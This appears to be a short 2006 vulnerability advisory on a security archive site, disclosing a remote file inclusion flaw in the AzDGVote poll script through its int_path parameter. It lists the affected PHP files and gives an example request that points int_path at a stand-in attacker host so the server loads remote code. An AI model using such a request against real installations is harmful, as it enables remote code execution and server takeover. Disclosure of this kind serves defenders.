Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12185
HistoryApr 12, 2006 - 12:00 a.m.

AzDGVote File inclusion

2006-04-1200:00:00
vulners.com
17

AzDGVote File inclusion

Site:http://www.azdg.com/
Demo:http://www.azdg.com/scripts/AzDGVote/vote.php?id=1


File inclusion

include $int_path."/AzDG.template.inc.php";

int_path parameter File inclusion

Aut File

vote.php,view.php,admin.php
and /admin/index.php


example

http://victim.com/poll/view.php?int_path=http://evilsite


Discovered By SnIpEr_SA
E-mail:[email protected],[email protected]
Site: www.3asfh.com www.lezr.com